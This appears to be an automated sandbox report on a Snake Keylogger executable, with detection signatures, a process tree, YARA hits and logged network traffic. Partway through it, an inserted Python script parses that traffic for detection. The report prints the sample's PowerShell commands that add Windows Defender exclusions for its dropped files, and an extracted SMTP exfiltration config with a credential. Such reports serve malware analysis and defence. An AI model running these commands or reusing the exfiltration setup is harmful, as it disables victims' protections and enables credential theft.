
Analysis Report lfQuSBwdSf.exe

Overview

General Information

Sample Name: lfQuSBwdSf.exe
Analysis ID: 383847
MD5: 0802967c1d72deeb4e1b79af74fdb553
SHA1: f8edbbed8318311f070167c73fcca9f63f79c905
SHA256: 201872c79f07606d9874bc471acf1999e0eef0703e73c71a4a297eb56c70bcfb
Tags: exe, SnakeKeylogger

Detection

Snake Keylogger
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Yara detected Snake Keylogger
Adds a directory exclusion to Windows Defender
Changes security center settings (notifications, updates, antivirus, firewall)
Creates an autostart registry key pointing to binary in C:\Windows
Drops PE files with benign system names
Drops executables to the windows directory (C:\Windows) and starts them
Hides threads from debuggers
Injects a PE file into a foreign processes
Machine Learning detection for dropped file
Machine Learning detection for sample
May check the online IP address of the machine
Tries to delay execution (extensive OutputDebugStringW loop)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file access)
Yara detected Beds Obfuscator
Antivirus or Machine Learning detection for unpacked file
Binary contains a suspicious time stamp
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
One or more processes crash
PE file contains an invalid checksum
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Tries to load missing DLLs
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection

Startup

  • System is w10x64
  • lfQuSBwdSf.exe (PID: 2788 cmdline: 'C:\Users\user\Desktop\lfQuSBwdSf.exe' MD5: 0802967C1D72DEEB4E1B79AF74FDB553)
    • powershell.exe (PID: 1004 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Cursors\WQzhTjfBsYrOnkh\svchost.exe' -Force MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 4808 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • powershell.exe (PID: 720 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\lfQuSBwdSf.exe' -Force MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 4456 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • powershell.exe (PID: 1000 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Cursors\WQzhTjfBsYrOnkh\svchost.exe' -Force MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 5988 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • cmd.exe (PID: 3984 cmdline: 'C:\Windows\System32\cmd.exe' /c timeout 1 MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • conhost.exe (PID: 5816 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • timeout.exe (PID: 6248 cmdline: timeout 1 MD5: 121A4EDAE60A7AF6F5DFA82F7BB95659)
    • lfQuSBwdSf.exe (PID: 6864 cmdline: C:\Users\user\Desktop\lfQuSBwdSf.exe MD5: 0802967C1D72DEEB4E1B79AF74FDB553)
    • WerFault.exe (PID: 6164 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 2788 -s 2300 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
  • svchost.exe (PID: 4908 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 6216 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 6528 cmdline: 'C:\Windows\Cursors\WQzhTjfBsYrOnkh\svchost.exe' MD5: 0802967C1D72DEEB4E1B79AF74FDB553)
  • svchost.exe (PID: 6624 cmdline: C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 6672 cmdline: c:\windows\system32\svchost.exe -k unistacksvcgroup MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 6712 cmdline: c:\windows\system32\svchost.exe -k localservice -p -s CDPSvc MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 6872 cmdline: c:\windows\system32\svchost.exe -k networkservice -p -s DoSvc MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 6908 cmdline: 'C:\Windows\Cursors\WQzhTjfBsYrOnkh\svchost.exe' MD5: 0802967C1D72DEEB4E1B79AF74FDB553)
    • powershell.exe (PID: 4424 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Cursors\WQzhTjfBsYrOnkh\svchost.exe' -Force MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 2120 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • powershell.exe (PID: 5092 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Cursors\WQzhTjfBsYrOnkh\svchost.exe' -Force MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 5136 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • powershell.exe (PID: 3348 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Cursors\WQzhTjfBsYrOnkh\svchost.exe' -Force MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 5224 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • svchost.exe (PID: 6932 cmdline: C:\Windows\System32\svchost.exe -k NetworkService -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 7064 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 7152 cmdline: c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s wscsvc MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 1648 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 5232 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)

Malware Configuration

Threatname: Snake Keylogger

{"Exfil Mode": "SMTP", "SMTP Info": {"Port": "587", "SMTP Credential": "bal@nobettwo.xyzKvgnCIGBE8+Hnobettwo.xyz"}}

Yara Overview

Memory Dumps

Source | Rule | Description | Author | Strings
00000015.00000002.485923538.0000000000402000.00000040.00000001.sdmp | JoeSecurity_BedsObfuscator | Yara detected Beds Obfuscator | Joe Security |
00000015.00000002.485923538.0000000000402000.00000040.00000001.sdmp | JoeSecurity_SnakeKeylogger | Yara detected Snake Keylogger | Joe Security |
00000017.00000002.541864387.0000000004A72000.00000004.00000001.sdmp | JoeSecurity_BedsObfuscator | Yara detected Beds Obfuscator | Joe Security |
00000017.00000002.541864387.0000000004A72000.00000004.00000001.sdmp | JoeSecurity_SnakeKeylogger | Yara detected Snake Keylogger | Joe Security |
00000011.00000002.517681508.0000000004965000.00000004.00000001.sdmp | JoeSecurity_BedsObfuscator | Yara detected Beds Obfuscator | Joe Security |
(1 further entry not shown)

Unpacked PEs

Source | Rule | Description | Author | Strings
23.2.svchost.exe.4a72390.5.unpack | JoeSecurity_BedsObfuscator | Yara detected Beds Obfuscator | Joe Security |
23.2.svchost.exe.4a72390.5.unpack | JoeSecurity_SnakeKeylogger | Yara detected Snake Keylogger | Joe Security |
23.2.svchost.exe.4ad53b0.6.unpack | JoeSecurity_BedsObfuscator | Yara detected Beds Obfuscator | Joe Security |
23.2.svchost.exe.4ad53b0.6.unpack | JoeSecurity_SnakeKeylogger | Yara detected Snake Keylogger | Joe Security |
23.2.svchost.exe.4ad53b0.6.raw.unpack | JoeSecurity_BedsObfuscator | Yara detected Beds Obfuscator | Joe Security |
(13 further entries not shown)

Sigma Overview

No Sigma rule has matched

Signature Overview

AV Detection:

Found malware configuration
Source: 00000017.00000002.541864387.0000000004A72000.00000004.00000001.sdmp | Malware Configuration Extractor: Snake Keylogger {"Exfil Mode": "SMTP", "SMTP Info": {"Port": "587", "SMTP Credential": "bal@nobettwo.xyzKvgnCIGBE8+Hnobettwo.xyz"}}
Multi AV Scanner detection for dropped file
Source: C:\Windows\Cursors\WQzhTjfBsYrOnkh\svchost.exe | ReversingLabs: Detection: 29%
Multi AV Scanner detection for submitted file
Source: lfQuSBwdSf.exe | Virustotal: Detection: 24%
Source: lfQuSBwdSf.exe | ReversingLabs: Detection: 29%
Machine Learning detection for dropped file
Source: C:\Windows\Cursors\WQzhTjfBsYrOnkh\svchost.exe | Joe Sandbox ML: detected
Machine Learning detection for sample
Source: lfQuSBwdSf.exe | Joe Sandbox ML: detected
Source: 21.2.lfQuSBwdSf.exe.400000.0.unpack | Avira: Label: TR/Spy.Gen
Source: unknown | HTTPS traffic detected: 104.21.56.119:443 -> 192.168.2.3:49701 version: TLS 1.0
Source: unknown | HTTPS traffic detected: 172.67.188.154:443 -> 192.168.2.3:49725 version: TLS 1.0
Source: unknown | HTTPS traffic detected: 172.67.188.154:443 -> 192.168.2.3:49737 version: TLS 1.0
Source: unknown | HTTPS traffic detected: 172.67.188.154:443 -> 192.168.2.3:49777 version: TLS 1.0
Source: lfQuSBwdSf.exe | Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Source: Binary string: \??\C:\Windows\dll\Microsoft.VisualBasic.pdbOS source: lfQuSBwdSf.exe, 00000000.00000002.341939107.00000000013F2000.00000004.00000020.sdmp
Source: Binary string: \??\C:\Windows\dll\Microsoft.VisualBasic.pdbs source: lfQuSBwdSf.exe, 00000000.00000002.341939107.00000000013F2000.00000004.00000020.sdmp
Source: Binary string: npAjVisualBasic.pdb source: lfQuSBwdSf.exe, 00000000.00000002.333378140.00000000010F7000.00000004.00000010.sdmp
Source: Binary string: \??\C:\Windows\symbols\dll\Microsoft.VisualBasic.pdbs source: lfQuSBwdSf.exe, 00000000.00000002.341262404.00000000013C2000.00000004.00000020.sdmp
Source: Binary string: \??\C:\Windows\dll\mscorlib.pdb source: lfQuSBwdSf.exe, 00000000.00000002.340683009.0000000001392000.00000004.00000020.sdmp
Source: Binary string: (P6jLC:\Windows\Microsoft.VisualBasic.pdb source: lfQuSBwdSf.exe, 00000000.00000002.333378140.00000000010F7000.00000004.00000010.sdmp
Source: Binary string: lfQuSBwdSf.PDB source: lfQuSBwdSf.exe, 00000000.00000002.333378140.00000000010F7000.00000004.00000010.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.pdb source: lfQuSBwdSf.exe, 00000000.00000002.342059141.00000000013FA000.00000004.00000020.sdmp
Source: Binary string: f:\binaries\Intermediate\vb\microsoft.visualbasic.build.vbproj_731629843\objr\x86\Microsoft.VisualBasic.pdb, source: lfQuSBwdSf.exe, 00000000.00000002.342059141.00000000013FA000.00000004.00000020.sdmp
Source: Binary string: \??\C:\Windows\mscorlib.pdb source: lfQuSBwdSf.exe, 00000000.00000002.341262404.00000000013C2000.00000004.00000020.sdmp
Source: Binary string: \??\C:\Users\user\Desktop\lfQuSBwdSf.PDB source: lfQuSBwdSf.exe, 00000000.00000002.342059141.00000000013FA000.00000004.00000020.sdmp
Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdb1G source: lfQuSBwdSf.exe, 00000000.00000002.342059141.00000000013FA000.00000004.00000020.sdmp
Source: Binary string: C:\Users\user\Desktop\lfQuSBwdSf.PDB source: lfQuSBwdSf.exe, 00000000.00000002.333378140.00000000010F7000.00000004.00000010.sdmp
Source: Binary string: C:\Windows\Microsoft.VisualBasic.pdbpdbsic.pdb source: lfQuSBwdSf.exe, 00000000.00000002.341262404.00000000013C2000.00000004.00000020.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.pdby source: lfQuSBwdSf.exe, 00000000.00000002.342059141.00000000013FA000.00000004.00000020.sdmp
Source: Binary string: .pdb%H source: lfQuSBwdSf.exe, 00000000.00000002.333378140.00000000010F7000.00000004.00000010.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.VisualBasic.pdb source: lfQuSBwdSf.exe, 00000000.00000002.342059141.00000000013FA000.00000004.00000020.sdmp

Networking:

May check the online IP address of the machine
Source: C:\Users\user\Desktop\lfQuSBwdSf.exe | DNS query: name: checkip.dyndns.org
Source: C:\Users\user\Desktop\lfQuSBwdSf.exe | DNS query: name: checkip.dyndns.org
Source: C:\Users\user\Desktop\lfQuSBwdSf.exe | DNS query: name: checkip.dyndns.org
Source: C:\Users\user\Desktop\lfQuSBwdSf.exe | DNS query: name: checkip.dyndns.org
Source: unknown | DNS query: name: checkip.dyndns.org
Source: unknown | DNS query: name: checkip.dyndns.org
Source: unknown | DNS query: name: checkip.dyndns.org
Source: unknown | DNS query: name: checkip.dyndns.org
Source: C:\Users\user\Desktop\lfQuSBwdSf.exe | DNS query: name: checkip.dyndns.org
Source: C:\Users\user\Desktop\lfQuSBwdSf.exe | DNS query: name: checkip.dyndns.org
Source: unknown | DNS query: name: checkip.dyndns.org
Source: unknown | DNS query: name: checkip.dyndns.org
Source: global traffic | HTTP traffic detected: GET /liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-7C92219C6C42B363C26A6A670922F074.html HTTP/1.1 UserAgent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.106 Safari/537.36 OPR/38.0.2220.41 Host: myliverpoolnews.cf Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-133B76AB9374D6781F41A2D553BC2BA3.html HTTP/1.1 UserAgent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.106 Safari/537.36 OPR/38.0.2220.41 Host: myliverpoolnews.cf
Source: global traffic | HTTP traffic detected: GET /liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-5C52937048F55BFE92995966F69D90F1.html HTTP/1.1 UserAgent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.106 Safari/537.36 OPR/38.0.2220.41 Host: myliverpoolnews.cf
Source: Joe Sandbox View | IP Address: 162.88.193.70 162.88.193.70
Source: Joe Sandbox View | JA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
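The entries above are the sandbox's record of the sample repeatedly fetching its external IP address from checkip.dyndns.org with a fixed, long-obsolete User-Agent (MSIE 6.0 / .NET CLR 1.0.3705). As an added example, not part of the Joe Sandbox report, the following Python parses HTTP request entries in the flattened form this page uses, reconstructs the request line and headers, and flags what a detection rule would key on here: a request to a public IP-echo service, that hard-coded User-Agent, and the missing-User-Agent case the report's signature list also calls out. The two checkip lines are taken from the report; the POST to example.invalid and the list of IP-echo hosts are constructed assumptions.

```python
import re
from collections import Counter

# Sample entries. The first two are copied from this report; the third is
# constructed (not from the report) to exercise the no-User-Agent case.
REPORT_LINES = [
    "Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org",
    "Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive",
    "Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Host: example.invalidContent-Length: 12",
]

# Header names we know how to split on; the report runs each header straight
# after the previous value, so a lookahead on "Name: " is the only separator.
HEADER_NAMES = ("User-Agent", "Host", "Connection", "Content-Length",
                "Content-Type", "Accept", "Accept-Encoding", "Cache-Control")
_HEADER_SPLIT = re.compile(r"(?=(?:%s): )" % "|".join(re.escape(h) for h in HEADER_NAMES))

# Assumption: public services that echo the caller's IP, commonly used by stealers.
IP_ECHO_HOSTS = {"checkip.dyndns.org", "api.ipify.org", "icanhazip.com", "ifconfig.me", "ip-api.com"}
# The fixed User-Agent seen in this report: IE6 plus .NET CLR 1.0.3705, with or without the space.
LEGACY_UA = re.compile(r"MSIE 6\.0;.*\.NET CLR ?1\.0\.3705")


def parse_request(line):
    """Turn one flattened 'HTTP traffic detected' entry into method/path/version/headers.
    Returns None for entries of another kind (DNS, strings, ...)."""
    m = re.search(r"HTTP traffic detected: (.*)$", line)
    if not m:
        return None
    parts = [p.strip() for p in _HEADER_SPLIT.split(m.group(1)) if p.strip()]
    method, path, version = parts[0].split(" ", 2)
    headers = {}
    for part in parts[1:]:
        name, _, value = part.partition(": ")
        headers[name] = value
    return {"method": method, "path": path, "version": version, "headers": headers}


def classify(req):
    """Return the set of detection tags that apply to one parsed request."""
    tags = set()
    host = req["headers"].get("Host", "")
    ua = req["headers"].get("User-Agent")
    if host in IP_ECHO_HOSTS:
        tags.add("external-ip-check")
    if ua is None:
        tags.add("no-user-agent")
    elif LEGACY_UA.search(ua):
        tags.add("legacy-dotnet-ua")
    return tags


def analyse(lines):
    """Count requests per Host and merge the tags seen for each Host."""
    counts = Counter()
    findings = {}
    for line in lines:
        req = parse_request(line)
        if req is None:
            continue
        host = req["headers"].get("Host", "?")
        counts[host] += 1
        findings.setdefault(host, set()).update(classify(req))
    return counts, findings


if __name__ == "__main__":
    counts, findings = analyse(REPORT_LINES)
    for host in counts:
        print(f"{host:24} {counts[host]:3} request(s)  {sorted(findings[host])}")
```

The repeat count matters as much as the tags: one lookup of an IP-echo service is unremarkable in a browser session, but dozens of identical requests with a User-Agent no current client sends, from a process that is not a browser, is the pattern worth alerting on.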
Source: lfQuSBwdSf.exe, 00000000.00000003.228963232.00000000040EA000.00000004.00000001.sdmp  String found in binary or memory: <footer><ul id="section-links"><li><a href="https://www.liverpool.com/liverpool-fc-news/" data-link-tracking="Footer|Liverpool FC News">Liverpool FC News</a></li><li><a href="https://www.liverpool.com/schedule/" data-link-tracking="Footer|Schedule">Schedule</a></li><li><a href="https://www.liverpool.com/liverpool-fc-news/features/" data-link-tracking="Footer|Features">Features</a></li><li><a href="https://www.liverpool.com/all-about/premier-league" data-link-tracking="Footer|Premier League">Premier League</a></li></ul><div class="social-links"><h4>Follow us<ul><li class="follow hidden"><span class="follow-text publication-theme">Follow us</span></li><li><a class="icon facebook" title="facebook" href="https://www.facebook.com/liverpooldotcom" target="_blank" data-provider="facebook" data-tracking="facebook|follow|bottom"></a></li><li><a class="icon twitter" title="twitter" href="https://twitter.com/liverpoolcom_" 